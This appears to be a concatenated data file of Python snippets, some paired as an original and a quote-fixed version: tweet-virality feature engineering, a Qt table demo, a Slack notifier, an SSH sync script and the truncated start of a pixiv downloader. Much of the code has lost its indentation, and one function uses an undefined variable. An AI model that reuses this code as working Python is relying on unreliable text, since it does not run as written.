        test = df[df['virality'].isnull()]
        del test['virality']; _ = gc.collect()
        print(f"train.shape = {train.shape}, test.shape = {test.shape}")
        return train, test
    # end of def get_data
    def add_virality_feature(self, df):
        """Add 'user_virality': the user's mean virality over train rows only."""
        df_train = df[~df['virality'].isnull()]
        viral_user = df_train.groupby('tweet_user_id')['virality'].mean().reset_index()
        viral_user.columns = ['tweet_user_id', 'user_virality']
        df = df.merge(viral_user, how='left', on='tweet_user_id')
        return df
    def optimize_ints(self, df):
        """Downcast the null-free candidate columns (cols2int8) to int8."""
        int8_candidates = self.cols2int8
        # for col in ['tweet_created_at_year', 'user_created_at_year']:
        #     if col in df.columns:
        #         df.loc[:, col] = df.loc[:, col] - 2000
        #         df.loc[:, col] = df.loc[:, col].astype(np.int8)
        for col in int8_candidates:
            if (col in df.columns) and (df[col].isnull().sum()==0):
                df.loc[:, col] = df.loc[:, col].astype(np.int8)
        return df
# end of class Features
def logtransform(df, cols2log):
    """Replace each listed column with log(value + 2), in place."""
    shifted = df[cols2log] + 2
    df.loc[:, cols2log] = np.log(shifted)
    return df
class NormalizeFeats_Parallel():
    """Per-column scaling with the joblib threading backend.

    https://scikit-learn.org/stable/computing/parallelism.html

    FIXES vs. original:
    - train mode stored the SAME scaler object for every column (each fit
      overwrote the previous state), so test-mode transforms used the last
      column's statistics for all columns. A fresh scaler is now cloned
      per column via type(scaler)(**scaler.get_params()).
    - the mutable default argument `scaler=StandardScaler()` (shared
      instance) is replaced by a None sentinel.
    """
    def __init__(self, feat_cols: list):
        self.feat_cols = feat_cols
        # column name -> fitted scaler, filled in train mode
        self.scalers_dict = {}

    def normalize_data(self, df, mode='train', scaler=None):
        """Scale df[feat_cols] in place; fit one scaler per column when
        mode=='train', otherwise reuse the stored fitted scalers."""
        if scaler is None:
            scaler = StandardScaler()
        if mode == 'train':
            for col in self.feat_cols:
                # independent clone per column (see class docstring)
                col_scaler = type(scaler)(**scaler.get_params())
                with parallel_backend('threading', n_jobs=n_cpus):
                    col_scaler.fit(df[col].values.reshape(-1, 1))
                self.scalers_dict[col] = col_scaler
                df.loc[:, col] = col_scaler.transform(df[col].values.reshape(-1, 1))
        else:
            for col in self.feat_cols:
                with parallel_backend('threading', n_jobs=n_cpus):
                    df.loc[:, col] = self.scalers_dict[col].transform(df[col].values.reshape(-1, 1))
        return df
class NormalizeFeats():
    """Per-column scaler wrapper: fit on train, reuse the fitted scalers
    on validation/test frames.

    FIXES vs. original:
    - train mode stored the SAME scaler object for every column (each fit
      overwrote the previous state), so mode!='train' transformed every
      column with the LAST column's statistics. A fresh scaler is now
      cloned per column via type(scaler)(**scaler.get_params()).
    - the mutable default argument `scaler=StandardScaler()` (shared
      instance) is replaced by a None sentinel.
    """
    def __init__(self, feat_cols: list):
        self.feat_cols = feat_cols
        # column name -> fitted scaler, filled in train mode
        self.scalers_dict = {}

    def normalize_data(self, df, mode='train', scaler=None):
        """Scale df[feat_cols] in place; fit per column when mode=='train'."""
        if scaler is None:
            scaler = StandardScaler()
        if mode == 'train':
            for col in self.feat_cols:
                col_scaler = type(scaler)(**scaler.get_params())
                col_scaler.fit(df[col].values.reshape(-1, 1))
                self.scalers_dict[col] = col_scaler
                df.loc[:, col] = col_scaler.transform(df[col].values.reshape(-1, 1))
        else:
            for col in self.feat_cols:
                df.loc[:, col] = self.scalers_dict[col].transform(df[col].values.reshape(-1, 1))
        return df
def transform_joint(train, test=None, norm_cols=None, tfm=None):
    """Fit `tfm` on the stacked train(+test) values of norm_cols and
    transform both frames in place. Columns are processed in chunks of
    at most 1000 to bound peak memory; `tfm` is refit per chunk (as in
    the original). Returns (train, test); test may be None.

    FIXES vs. original:
    - default `tfm` was a shared StandardScaler instance (mutable default
      argument that fit() mutates across calls); now created per call.
    - the chunked branch created an unused StandardScaler and passed a
      raw DataFrame (missing .values) to fit when test was None.
    """
    if tfm is None:
        tfm = StandardScaler()
    l_train = len(train)
    # one pass per <=1000-column chunk (a single chunk when few columns)
    col_chunks = [norm_cols[i:i + 1000] for i in range(0, len(norm_cols), 1000)]
    for cols_chunk in col_chunks:
        if isinstance(test, pd.DataFrame):
            assert train[cols_chunk].columns.equals(test[cols_chunk].columns)
            data_chunk = pd.concat([train[cols_chunk], test[cols_chunk]]).values
        else:
            data_chunk = train[cols_chunk].values
        with parallel_backend('threading', n_jobs=n_cpus):
            tfm.fit(data_chunk)
        data_chunk = tfm.transform(data_chunk)
        train.loc[:, cols_chunk] = data_chunk[:l_train]
        if isinstance(test, pd.DataFrame):
            test.loc[:, cols_chunk] = data_chunk[l_train:]
    return train, test  # test can be None
def normalize_npnan(train, test=None, norm_cols=[]):
    """Z-score norm_cols using NaN-aware mean/std over train(+test) rows.

    Frames are modified in place; many columns are handled in chunks of
    1000 to bound memory. Returns (train, test); test may be None.
    """
    if len(norm_cols) == 0:
        raise NotImplementedError
    n_train_rows = len(train)

    def _zscore(values):
        # population (ddof=0) statistics, ignoring NaNs
        return (values - np.nanmean(values, axis=0)) / np.nanstd(values, axis=0)

    if len(norm_cols) < 1000:
        if isinstance(test, pd.DataFrame):
            stacked = pd.concat([train[norm_cols], test[norm_cols]]).values
        else:
            stacked = train[norm_cols].values
        stacked = _zscore(stacked)
        train.loc[:, norm_cols] = stacked[:n_train_rows]
        if isinstance(test, pd.DataFrame):
            test.loc[:, norm_cols] = stacked[n_train_rows:]
    else:
        for start in range(0, len(norm_cols), 1000):
            chunk_cols = norm_cols[start:start + 1000]
            if isinstance(test, pd.DataFrame):
                chunk = pd.concat([train[chunk_cols], test[chunk_cols]]).values
            else:
                chunk = train[chunk_cols]
            chunk = _zscore(chunk)
            train.loc[:, chunk_cols] = chunk[:n_train_rows]
            if isinstance(test, pd.DataFrame):
                test.loc[:, chunk_cols] = chunk[n_train_rows:]
    return train, test
def normalize_joint(train, test=None, norm_cols=None):
    """StandardScaler-normalize norm_cols over the stacked train(+test) rows.

    Frames are modified in place and returned; test may be None. Columns
    are processed in chunks of 1000 to bound peak memory; a fresh scaler
    is fit per chunk.
    NOTE(review): in the chunked branch the test-is-None case passes a raw
    DataFrame (no .values) to the scaler — works, but is inconsistent with
    the small-column branch; confirm intended.
    """
    # normalize joint train test data in chunks by columns
    l_train = len(train)
    if len(norm_cols) < 1000:
        if isinstance(test, pd.DataFrame):
            assert train[norm_cols].columns.equals(test[norm_cols].columns)
            data = pd.concat([train[norm_cols], test[norm_cols]]).values
        else:
            data = train[norm_cols].values
        scaler = StandardScaler()
        with parallel_backend('threading', n_jobs=n_cpus):
            scaler.fit(data)
        data = scaler.transform(data)
        train.loc[:, norm_cols] = data[:l_train]
        if isinstance(test, pd.DataFrame):
            test.loc[:, norm_cols] = data[l_train:]
    else: # len(norm_cols) >= 1000
        all_col_chunks = [norm_cols[i:i+1000] for i in range(0, len(norm_cols), 1000)]
        for cols_chunk in all_col_chunks:
            if isinstance(test, pd.DataFrame):
                assert train[norm_cols].columns.equals(test[norm_cols].columns)
                data_chunk = pd.concat([train[cols_chunk], test[cols_chunk]]).values
            else:
                data_chunk = train[cols_chunk]
            scaler = StandardScaler()
            with parallel_backend('threading', n_jobs=n_cpus):
                scaler.fit(data_chunk)
            data_chunk = scaler.transform(data_chunk)
            train.loc[:, cols_chunk] = data_chunk[:l_train] # todo LONGEST RUNTIME and memory
            if isinstance(test, pd.DataFrame):
                test.loc[:, cols_chunk] = data_chunk[l_train:] # todo LONGEST RUNTIME and memory
    return train, test # test cab be None
def normalize_joint_parallel(train, test, norm_cols, num_workers=6):
    """Like normalize_joint, but requires both frames (test must not be None).

    NOTE(review): `Parallel`/`delayed` are imported but never used, and
    `num_workers` is ignored (the module-level n_cpus is used instead) —
    confirm intent before relying on the parameter.
    """
    # normalize joint train test data in chunks by columns
    from joblib import Parallel, delayed
    l_train = len(train)
    assert train[norm_cols].columns.equals(test[norm_cols].columns)
    if len(norm_cols) < 1000:
        data = pd.concat([train[norm_cols], test[norm_cols]]).values
        scaler = StandardScaler()
        with parallel_backend('threading', n_jobs=n_cpus):
            scaler.fit(data)
        data = scaler.transform(data)
        train.loc[:, norm_cols] = data[:l_train]
        test.loc[:, norm_cols] = data[l_train:]
    else: # len(norm_cols) >= 1000
        all_col_chunks = [norm_cols[i:i+1000] for i in range(0, len(norm_cols), 1000)]
        for cols_chunk in all_col_chunks:
            data_chunk = pd.concat([train[cols_chunk], test[cols_chunk]]).values
            scaler = StandardScaler()
            with parallel_backend('threading', n_jobs=n_cpus):
                scaler.fit(data_chunk)
            data_chunk = scaler.transform(data_chunk)
            train.loc[:, cols_chunk] = data_chunk[:l_train] # todo LONGEST RUNTIME and memory
            test.loc[:, cols_chunk] = data_chunk[l_train:] # todo LONGEST RUNTIME and memory
    return train, test
def split2folds_user_viral(df, n_folds, seed_folds, label_cols=None, foldnum_col='fold'):
    """Stratified fold assignment on the combination of two label columns
    (e.g. user id x virality). Adds an int foldnum_col and returns df;
    the temporary combined label column is removed afterwards.
    """
    combo_col = label_cols[0] + "_" + label_cols[1]
    df[combo_col] = df[label_cols[0]].astype(str) + "_" + df[label_cols[1]].astype(str)
    df[combo_col] = df[combo_col].astype('category')
    splitter = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=seed_folds)
    df[foldnum_col] = np.nan
    fold_loc = df.columns.get_loc(foldnum_col)
    for fold_idx, (_, holdout_idx) in enumerate(
            splitter.split(np.zeros(df.shape[0]), df[combo_col])):
        df.iloc[holdout_idx, fold_loc] = fold_idx
    df[foldnum_col] = df[foldnum_col].astype(int)
    del df[combo_col]
    return df
def split2folds_viral_only(df, n_folds, seed_folds, label_col='label', foldnum_col='fold'):
    """Stratified fold assignment on a single label column; adds an int
    foldnum_col to df and returns it."""
    splitter = StratifiedKFold(n_splits=n_folds, shuffle=True, random_state=seed_folds)
    df[foldnum_col] = np.nan
    fold_loc = df.columns.get_loc(foldnum_col)
    for fold_idx, (_, holdout_idx) in enumerate(
            splitter.split(df.values[:, :1], df[label_col])):
        df.iloc[holdout_idx, fold_loc] = fold_idx
    df[foldnum_col] = df[foldnum_col].astype(int)
    return df
def split2folds_simple(df, n_folds, seed_folds, foldnum_col='fold'):
    """Unstratified KFold fold assignment: adds an int foldnum_col to df.

    FIX: `KFold` was referenced here but never imported in this module
    (NameError at call time); it is now imported at the top of the file
    alongside StratifiedKFold.
    """
    skf = KFold(n_splits=n_folds, shuffle=True, random_state=seed_folds)
    df[foldnum_col] = np.nan
    for fold, (train_idx, val_idx) in enumerate(skf.split(df.values[:, :1])):
        df.iloc[val_idx, df.columns.get_loc(foldnum_col)] = fold
    df[foldnum_col] = df[foldnum_col].astype(int)
    return df
def get_folds(cfg, train, default_seed_folds=24):
    """Add a 'fold' column to `train` per cfg.folds_split_method; unknown
    methods leave the frame untouched."""
    if cfg.folds_split_method == 'user_viral':
        train = split2folds_user_viral(
            train, cfg.n_folds, cfg.seed_folds,
            label_cols=['tweet_user_id', 'virality'], foldnum_col='fold')
    return train
def get_feat_cols(train):
    """Partition train's columns into prefix-based feature groups.

    Returns (all feature cols, media image cols, text cols, user
    description cols, user image cols, remaining feature cols).
    """
    non_features = {'virality', 'tweet_id', 'fold', 'is_test'}
    feat_cols = [c for c in train.columns
                 if c not in non_features and not c.startswith('target_')]
    media_img_feat_cols = [c for c in train.columns if c.startswith('img_feature')]
    text_feat_cols = [c for c in train.columns if c.startswith('text_feature')]
    user_des_feat_cols = [c for c in train.columns if c.startswith('user_des_feature')]
    user_img_feat_cols = [c for c in train.columns if c.startswith('user_img_feature')]
    vector_cols = set(media_img_feat_cols) | set(text_feat_cols) \
        | set(user_img_feat_cols) | set(user_des_feat_cols)
    feats_some = [c for c in feat_cols if c not in vector_cols]
    return (feat_cols, media_img_feat_cols, text_feat_cols,
            user_des_feat_cols, user_img_feat_cols, feats_some)
def cond_drop_imgtext(cfg, df):
(feat_cols, media_img_feat_cols, text_feat_cols,
user_des_feat_cols, user_img_feat_cols, feats_some) = get_feat_cols(df)
if cfg.drop_media_img_feats:
df.drop(media_img_feat_cols, axis=1, inplace=True)
if cfg.drop_text_feats:
df.drop(text_feat_cols, axis=1, inplace=True)
if cfg.drop_user_des_feats:
df.drop(user_des_feat_cols, axis=1, inplace=True)
if cfg.drop_user_img_feats:
df.drop(user_img_feat_cols, axis=1, inplace=True)
return df
def add_topic_count(df):
# and drop the column
nan_replace = '0'
topics = df['tweet_topic_ids'].fillna(f'[{nan_replace}]')
# topics_xnan = train['tweet_topic_ids'].dropna()
# fill_value = topicsx_xnan.apply(lambda x: len(eval(x))).mean()
# fill_value = topicx_xnan.apply(lambda x: len(eval(x))).median()
n_topics = topics.apply(lambda x: len(eval(x)))
n_topics_mean = n_topics.mean()
n_topics = np.where(topics == nan_replace, n_topics_mean, n_topics)
df['n_topics'] = n_topics.astype(int)
return df
def add_topic_ids(df):
df.fillna({'tweet_topic_ids': "['0']"}, inplace=True)
topic_ids = (
df['tweet_topic_ids'].str.strip('[]').str.split('\s*,\s*').explode()
.str.get_dummies().sum(level=0).add_prefix('topic_id_')
)
topic_ids.rename(columns=lambda x: x.replace("'", ""), inplace=True)
if 'tweet_topic_ids' in df.columns:
df.drop('tweet_topic_ids', 1)
df = df.join(topic_ids) # , how='left', on='tweet_id')
for col_ in topic_ids.columns:
if df[col_].max() > 1:
df[f"{col_}_hthan1_binary"] = (df[col_] > 0).astype(np.int8)
df.drop('tweet_topic_ids',1, inplace=True)
return df
#
# def replace_add_new_topic_ids(train, test):
# # add topic_id cols (57) with number of times the topic is in the sample
# # add _binary cols (45) where =1 if topic_id is more than once
# old_topic_id_cols = [col for col in train.columns if 'topic_id' in col]
# print(f"old_topic_id_cols: {old_topic_id_cols}")
# len_train = train.shape[0]
# train = pd.concat([train, test]).reset_index(drop=True)
# del test;
# _ = gc.collect()
# train.drop(old_topic_id_cols, axis=1, inplace=True)
# train, new_topic_id_cols = add_new_topic_ids(base_dir, train, df_name='train_test')
# # todo cols ['topic_id_117' 'topic_id_123' 'topic_id_38'] are not in new_topic_id_cols
# # done: only one sample==1 for each topic_id_117 topic_id_123 topic_id_38 [0 42274 42274 42274] [1 1 1 1]
# for col_ in new_topic_id_cols:
# if train[col_].max() > 1:
# train[f"{col_}_hthan1_binary"] = (train[col_] > 0).astype(np.int8)
# # train.drop(col_, axis=1, inplace=True)
# test = train.iloc[len_train:, :].reset_index(drop=True)
# train = train.iloc[:len_train, :]
# return train, test
def extract_feats_media_text(df):
# todo extact_feats_media_text
# Set the target as well as dependent variables from image data.
y = vectorized_media_df['virality']
x = vectorized_media_df.loc[:, vectorized_media_df.columns.str.contains("img_")]
# Run Lasso regression for feature selection.
sel_model = SelectFromModel(LogisticRegression(C=1, penalty='l1', solver='liblinear'))
# time the model fitting
start = timeit.default_timer()
# Fit the trained model on our data
sel_model.fit(x, y)
stop = timeit.default_timer()
print('Time: ', stop - start)
# get index of good features
sel_index = sel_model.get_support()
# count the no of columns selected
counter = collections.Counter(sel_model.get_support())
print(counter)
def save_preprocessed(cfg, train, test, path_train, path_test):
# p_train = cfg.train_preprocessed_path
# p_test = cfg.test_preprocessed_path
# if cfg.debug:
# path_train = osj(os.path.dirname(p_train), 'debug_' + os.path.basename(path_train))
# path_test = osj(os.path.dirname(p_test), 'debug_' + os.path.basename(path_test))
assert not os.path.isfile(path_train), f"WON'T OVERWRITE/SAVE: file exists {os.path.basename(path_train)}"
assert not os.path.isfile(path_test), f"WON'T OVERWRITE/SAVE: file exists {os.path.basename(path_test)}"
train.to_csv(path_train, index=False)
test.to_csv(path_test, index=False)
def get_raw_train_tweet_cols(df):
# get cols from train_tweets.csv and users.csv
init_tweets_cols = ['tweet_id', 'tweet_user_id', 'tweet_created_at_year',
'tweet_created_at_month', 'tweet_created_at_day',
'tweet_created_at_hour', 'tweet_hashtag_count', 'tweet_url_count',
'tweet_mention_count', 'tweet_has_attachment', 'tweet_attachment_class',
'tweet_language_id', 'tweet_topic_ids', 'virality']
init_users_cols = ['user_id', 'user_like_count', 'user_followers_count',
'user_following_count', 'user_listed_on_count', 'user_has_location',
'user_tweet_count', 'user_has_url', 'user_verified',
'user_created_at_year', 'user_created_at_month']
def add_new_topic_ids(base_dir, df, df_name='train'):
if df_name=='train_test':
df_tweets = pd.read_csv(osj(base_dir, 'Tweets', f'train_tweets.csv'),
usecols=['tweet_id', 'tweet_topic_ids']
)
df_tweets_test = pd.read_csv(osj(base_dir, 'Tweets', f'test_tweets.csv'),
usecols=['tweet_id', 'tweet_topic_ids']
)
df_tweets = pd.concat([df_tweets, df_tweets_test]).reset_index(drop=True)
# df_tweets = df.reindex(df.index)
else:
df_tweets = pd.read_csv(osj(base_dir, 'Tweets', f'{df_name}_tweets.csv'),
usecols=['tweet_id', 'tweet_topic_ids']
)
df_tweets.fillna({'tweet_topic_ids': "['0']"}, inplace=True)
topic_ids = (
df_tweets['tweet_topic_ids'].str.strip('[]').str.split('\s*,\s*').explode()
.str.get_dummies().sum(level=0).add_prefix('topic_id_')
)
topic_ids.rename(columns=lambda x: x.replace("'", ""), inplace=True)
topic_ids['tweet_id'] = df_tweets['tweet_id']
if 'tweet_topic_ids' in df.columns:
df.drop('tweet_topic_ids')
df = df.merge(topic_ids, how='left', on='tweet_id')
return df, list(topic_ids.columns)
|
import sys
import os
from qtpy.QtWidgets import QApplication
from bioimageit_framework.theme import BiThemeAccess, BiThemeSheets
from bioimageit_framework.widgets import BiWidget, BiTable, showInfoBox
class MyExampleTable(BiWidget):
"""Create a table with an open button in the first row
Parameters
----------
header: list
List of the header labels
data: ndarray
data matrix
"""
def __init__(self, headers, data):
self.table = BiTable()
self.widget = self.table.widget
self.table.prepare_header(headers)
self.table.prepare_data(data)
self.table.prepare_col_button(0, 'primary', 'Open', self.open)
self.table.build()
def open(self, emitter):
showInfoBox(f'you clicked the button open row {emitter.content['row']}')
if __name__ == '__main__':
# Create the Qt Application
app = QApplication(["BioImageIT"])
dir_path = os.path.dirname(os.path.realpath(__file__))
# load and set the theme
BiThemeAccess(os.path.join(dir_path, '..', 'theme', 'dark'))
BiThemeAccess.instance().set_stylesheet(app, BiThemeSheets.sheets())
headers = ['', 'x', 'y', 'z']
data = [[12, 26, 2], [14, 27, 3], [16, 28, 4]]
table = MyExampleTable(headers, data)
table.widget.show()
# Run the main Qt loop
sys.exit(app.exec_())
| import sys
import os
from qtpy.QtWidgets import QApplication
from bioimageit_framework.theme import BiThemeAccess, BiThemeSheets
from bioimageit_framework.widgets import BiWidget, BiTable, showInfoBox
class MyExampleTable(BiWidget):
"""Create a table with an open button in the first row
Parameters
----------
header: list
List of the header labels
data: ndarray
data matrix
"""
def __init__(self, headers, data):
self.table = BiTable()
self.widget = self.table.widget
self.table.prepare_header(headers)
self.table.prepare_data(data)
self.table.prepare_col_button(0, 'primary', 'Open', self.open)
self.table.build()
def open(self, emitter):
showInfoBox(f'you clicked the button open row {emitter.content["row"]}')
if __name__ == '__main__':
# Create the Qt Application
app = QApplication(["BioImageIT"])
dir_path = os.path.dirname(os.path.realpath(__file__))
# load and set the theme
BiThemeAccess(os.path.join(dir_path, '..', 'theme', 'dark'))
BiThemeAccess.instance().set_stylesheet(app, BiThemeSheets.sheets())
headers = ['', 'x', 'y', 'z']
data = [[12, 26, 2], [14, 27, 3], [16, 28, 4]]
table = MyExampleTable(headers, data)
table.widget.show()
# Run the main Qt loop
sys.exit(app.exec_())
|
import json
import logging
import os
import requests
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def notify_horoscope_success_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "storing horoscope is success:smile:"
messages = [
f"job_id: {event["job_id"]}",
f"backend_name: {event["backend_name"]}",
f"creation_date: {event["creation_date"]} UTC",
]
_post_slack(title, "good", "\n".join(messages))
return event
def notify_horoscope_failed_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "storing horoscope is failure:rage:"
messages = ["Check detail!"]
if "detail" in event and "status" in event["detail"]:
messages.append(f'status: {event['detail']['status']}')
_post_slack(title, "danger", "\n".join(messages))
return event
def notify_horoscope_update_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "updating horoscope is success:smile:"
filtered_result = {int(k[4:]): v for k, v in event.items() if k.startswith("rank")}
sorted_result = sorted(filtered_result.items(), key=lambda x: x[0])
result = [
str(x[0])
+ ": "
+ x[1]
.replace(" ", "")
.replace("</td><td>", ", ")
.replace("<td>", "")
.replace("</td>", "")
for x in sorted_result
]
messages = [f"received new oracle at {event["creation_date"]} UTC"]
messages.extend(result)
messages.append("https://www.quantumcomputer.tokyo/horoscope.html")
_post_slack(title, "good", "\n".join(messages))
return event
def notify_horoscope_update_failed_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "updating horoscope is failure:rage:"
messages = ["Check detail!"]
if "detail" in event and "status" in event["detail"]:
messages.append(f'status: {event['detail']['status']}')
_post_slack(title, "danger", "\n".join(messages))
return event
def _post_slack(title: str, color: str, detail: str) -> None:
payload = {
"attachments": [
{
"color": color,
"pretext": f"[{os.environ["STAGE"]}] {title}",
"text": detail,
}
]
}
try:
slack_webhook_url = "https://" + os.environ["SLACK_WEBHOOK_URL"]
response = requests.post(slack_webhook_url, data=json.dumps(payload))
except requests.exceptions.RequestException:
logger.exception(f"failed to call slack_webhook")
else:
logger.info(f"slack_webhook_response status_code={response.status_code}")
| import json
import logging
import os
import requests
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def notify_horoscope_success_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "storing horoscope is success:smile:"
messages = [
f"job_id: {event['job_id']}",
f"backend_name: {event['backend_name']}",
f"creation_date: {event['creation_date']} UTC",
]
_post_slack(title, "good", "\n".join(messages))
return event
def notify_horoscope_failed_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "storing horoscope is failure:rage:"
messages = ["Check detail!"]
if "detail" in event and "status" in event["detail"]:
messages.append(f'status: {event["detail"]["status"]}')
_post_slack(title, "danger", "\n".join(messages))
return event
def notify_horoscope_update_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "updating horoscope is success:smile:"
filtered_result = {int(k[4:]): v for k, v in event.items() if k.startswith("rank")}
sorted_result = sorted(filtered_result.items(), key=lambda x: x[0])
result = [
str(x[0])
+ ": "
+ x[1]
.replace(" ", "")
.replace("</td><td>", ", ")
.replace("<td>", "")
.replace("</td>", "")
for x in sorted_result
]
messages = [f"received new oracle at {event['creation_date']} UTC"]
messages.extend(result)
messages.append("https://www.quantumcomputer.tokyo/horoscope.html")
_post_slack(title, "good", "\n".join(messages))
return event
def notify_horoscope_update_failed_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "updating horoscope is failure:rage:"
messages = ["Check detail!"]
if "detail" in event and "status" in event["detail"]:
messages.append(f'status: {event["detail"]["status"]}')
_post_slack(title, "danger", "\n".join(messages))
return event
def _post_slack(title: str, color: str, detail: str) -> None:
payload = {
"attachments": [
{
"color": color,
"pretext": f"[{os.environ['STAGE']}] {title}",
"text": detail,
}
]
}
try:
slack_webhook_url = "https://" + os.environ["SLACK_WEBHOOK_URL"]
response = requests.post(slack_webhook_url, data=json.dumps(payload))
except requests.exceptions.RequestException:
logger.exception(f"failed to call slack_webhook")
else:
logger.info(f"slack_webhook_response status_code={response.status_code}")
|
import os,sys
import signal
import paramiko
import configparser
from functools import partial
from multiprocessing import Process
from watchdog.observers import Observer
from lib.JournalSyncing import JournalSyncing
from lib.WorkspaceWatchDog import WorkspaceWatchDog
from lib.connections import select_server, get_servers
from time import localtime, strftime, sleep, time
def time_cli():
while True:
print(strftime("%Y-%m-%d %H:%M:%S", localtime()), end='\r', flush=True)
sleep(1)
def exit_handler(observers, default_server, clk_thr, signum = None, frame = None):
if signum: print (f'Signal Handler Called with Signal: {signum}')
print ('\nStopping the Observer...')
for observer in observers:
observers[observer].stop()
print ('Closing the SSH Connection...')
default_server['connection'].close()
clk_thr.join()
sys.exit(0)
'''
las sync --all: Implicit Folder Sync (GOTO: workspace.ini > SYNC ALL PATHS)
las sync --path WORKSPACE_PATH : Explicit Folder Sync
las <PROCESS>: Sync all paths on workspace.ini and Execute <PROCESS> on Default Server.
las --server SERVER_NAME --workspace WORKSPACE_NAME <PROCESS>: Sync selected workspace on workspace.ini and Execute <PROCESS> on Selected Server (SERVER_NAME must be on servers.ini).
'''
# TODO: Adjust it for the Generalized <las sync -s "SERVER" -w "WORKSPACE"> Command
if __name__ == '__main__':
properties = configparser.ConfigParser()
properties.read(os.path.join('.','config','props.ini'))
properties = properties['properties']
workspaces_config = configparser.ConfigParser()
workspaces_config.read(os.path.join('.','config','workspaces.ini'))
server_workspaces = workspaces_config[properties['default-server']]
default_server = get_servers(os.path.join('.','config','servers.ini'), properties['default-server'])
autosync = True
handlers = {}
observers = {}
for workspace_name in server_workspaces:
## Get the Workspace Directory of SSH Client
workspace_path = server_workspaces[workspace_name]
## Instantiate a WorkspaceWatchDog WatchDog (handler)
handlers[workspace_name] = WorkspaceWatchDog(local=True, verbose=True, workspace_name=workspace_name)
## Instantiate (and Start) a Recursive Observer Object for the given handler
observers[workspace_name] = Observer()
observers[workspace_name].schedule(handlers[workspace_name], path=workspace_path, recursive=True)
observers[workspace_name].start()
## Instantiate a JournalSyncing (handler)
jrnsync = JournalSyncing(default_server, server_workspaces, verbose=True, shallow_filecmp=True)
## Instantiate a CLI Clock for Monitoring the Program's Activity
clk_thr = Process(target=time_cli)
clk_thr.start()
# Handling System Shutdown Gracefully
## Instantiate a Signal Handler for System Shutdown
signal.signal(signal.SIGTERM, partial(exit_handler, observers, default_server, clk_thr))
signal.signal(signal.SIGINT, partial(exit_handler, observers, default_server, clk_thr))
while True:
# try:
jrnsync.journal_syncing()
sleep(jrnsync.sync_interval)
# except paramiko.SSHException:
# print (f'Can\'t connect to Server {jrnsync.ssh_client_dict['host']}')
# except IOError as e:
# print(e)
# pass
# except KeyboardInterrupt:
# exit_handler(observers, default_server) | import os,sys
import signal
import paramiko
import configparser
from functools import partial
from multiprocessing import Process
from watchdog.observers import Observer
from lib.JournalSyncing import JournalSyncing
from lib.WorkspaceWatchDog import WorkspaceWatchDog
from lib.connections import select_server, get_servers
from time import localtime, strftime, sleep, time
def time_cli():
while True:
print(strftime("%Y-%m-%d %H:%M:%S", localtime()), end='\r', flush=True)
sleep(1)
def exit_handler(observers, default_server, clk_thr, signum = None, frame = None):
if signum: print (f'Signal Handler Called with Signal: {signum}')
print ('\nStopping the Observer...')
for observer in observers:
observers[observer].stop()
print ('Closing the SSH Connection...')
default_server['connection'].close()
clk_thr.join()
sys.exit(0)
'''
las sync --all: Implicit Folder Sync (GOTO: workspace.ini > SYNC ALL PATHS)
las sync --path WORKSPACE_PATH : Explicit Folder Sync
las <PROCESS>: Sync all paths on workspace.ini and Execute <PROCESS> on Default Server.
las --server SERVER_NAME --workspace WORKSPACE_NAME <PROCESS>: Sync selected workspace on workspace.ini and Execute <PROCESS> on Selected Server (SERVER_NAME must be on servers.ini).
'''
# TODO: Adjust it for the Generalized <las sync -s "SERVER" -w "WORKSPACE"> Command
if __name__ == '__main__':
properties = configparser.ConfigParser()
properties.read(os.path.join('.','config','props.ini'))
properties = properties['properties']
workspaces_config = configparser.ConfigParser()
workspaces_config.read(os.path.join('.','config','workspaces.ini'))
server_workspaces = workspaces_config[properties['default-server']]
default_server = get_servers(os.path.join('.','config','servers.ini'), properties['default-server'])
autosync = True
handlers = {}
observers = {}
for workspace_name in server_workspaces:
## Get the Workspace Directory of SSH Client
workspace_path = server_workspaces[workspace_name]
## Instantiate a WorkspaceWatchDog WatchDog (handler)
handlers[workspace_name] = WorkspaceWatchDog(local=True, verbose=True, workspace_name=workspace_name)
## Instantiate (and Start) a Recursive Observer Object for the given handler
observers[workspace_name] = Observer()
observers[workspace_name].schedule(handlers[workspace_name], path=workspace_path, recursive=True)
observers[workspace_name].start()
## Instantiate a JournalSyncing (handler)
jrnsync = JournalSyncing(default_server, server_workspaces, verbose=True, shallow_filecmp=True)
## Instantiate a CLI Clock for Monitoring the Program's Activity
clk_thr = Process(target=time_cli)
clk_thr.start()
# Handling System Shutdown Gracefully
## Instantiate a Signal Handler for System Shutdown
signal.signal(signal.SIGTERM, partial(exit_handler, observers, default_server, clk_thr))
signal.signal(signal.SIGINT, partial(exit_handler, observers, default_server, clk_thr))
while True:
# try:
jrnsync.journal_syncing()
sleep(jrnsync.sync_interval)
# except paramiko.SSHException:
# print (f'Can\'t connect to Server {jrnsync.ssh_client_dict["host"]}')
# except IOError as e:
# print(e)
# pass
# except KeyboardInterrupt:
# exit_handler(observers, default_server) |
banner = '''
___ _ _ _
| _ \ (_) __ __ (_) __ __ (_) _ __ __ _ _ __ _ _
| _/ | | \ \ / | | \ V / | | | ' \ / _` | _ | '_ \ | || |
|_| |_| /_\_\ |_| \_/ ___ |_| |_|_|_| \__, | (_) | .__/ \_, |
|___| |___/ |_| |__/
'''
#-*- coding: utf-8 -*
import requests
import os
import re
import toml
from tqdm import tqdm
from json.decoder import JSONDecodeError
# get pixiv_cookie.toml
def config_pixiv():
cfg = toml.load(os.path.expanduser('./pixiv_cookie.toml'))
return cfg
def name_replace(str):
str = str.replace(r"\u0027",'')
str = str.replace(r'\\',"")
str = str.replace(r"/",'')
str = str.replace(r":",'')
str = str.replace(r"*",'')
str = str.replace(r"?",'')
str = str.replace(r'"','')
str = str.replace(r"<",'')
str = str.replace(r">",'')
str = str.replace(r"|",'')
return str
# mark folder
def mark_dir(name:str,search=None,ranking=None,r18mode=False):
if ranking == 'daily':
mode = 'daily'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'weekly':
mode = 'weekly'
